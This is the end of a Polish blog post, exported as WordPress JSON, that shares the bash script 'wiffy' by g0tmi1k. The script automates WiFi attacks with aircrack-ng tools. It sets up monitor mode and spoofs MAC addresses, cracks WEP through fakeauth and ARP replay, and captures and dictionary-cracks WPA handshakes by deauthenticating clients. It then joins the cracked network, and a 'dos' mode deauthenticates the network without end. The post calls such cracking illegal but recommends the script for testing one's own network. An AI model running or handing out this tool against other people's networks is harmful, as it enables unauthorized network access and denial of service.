\\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\n
Do pobrania<\/a>
\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831"}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}